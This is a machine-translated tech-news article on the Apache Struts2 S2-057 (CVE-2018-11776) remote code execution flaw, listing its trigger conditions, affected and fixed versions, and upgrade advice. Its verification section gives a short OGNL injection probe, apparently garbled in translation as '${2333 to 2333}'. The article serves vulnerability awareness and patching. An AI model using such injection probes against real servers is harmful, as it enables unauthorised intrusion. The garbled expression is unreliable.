In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-04 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Internet Technology >
Share
Shulou(Shulou.com)06/01 Report--
Today, I will talk to you about how to analyze the vulnerabilities of Apache Struts2 S2-057. many people may not understand it very well. in order to make you understand better, the editor has summarized the following contents for you. I hope you can get something according to this article.
If the namespace value is not set for the result defined in the underlying xml configuration, and its upper operation configuration does not have a namespace or wildcard namespace, a RCE attack may be performed. The same possibility is that when using the url tag, it has no value and action set, and its upper-level operation configuration has no or no wildcard namespace. -ApacheStruts2 team
On August 23, 2018, Apache Strust2 issued the latest security announcement that Apache Struts2 has a high-risk vulnerability in remote code execution, which is reported by Semmle Security Research team security researchers as CVE-2018-11776 (S2-057). Struts2 may cause remote code execution if the namespace value is not set in the XML configuration and is not set in (Action Configuration) or when the wildcard namespace is used.
0x01 vulnerability influence surface
Identify CVE-2018-11776 as a high-risk vulnerability. There are some limitations in the actual scene, and certain conditions need to be met.
Affect the version
Struts 2.3 to 2.3.34
Struts 2.5 to 2.5.16
Repair version
Struts 2.3.35 Struts 2.5.17
0x02 vulnerability verification
Pass in the OGNL expression ${2333 to 2333}
Successfully bring in the execution function and execute
Return the result to URL
0x03 repair recommendation
Official recommendation to upgrade Struts to version 2.3.35 or 2.5.17
There is no compatibility issue with this version update.
After reading the above, do you have any further understanding of how to conduct Apache Struts2 S2-057 vulnerability analysis? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 278
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.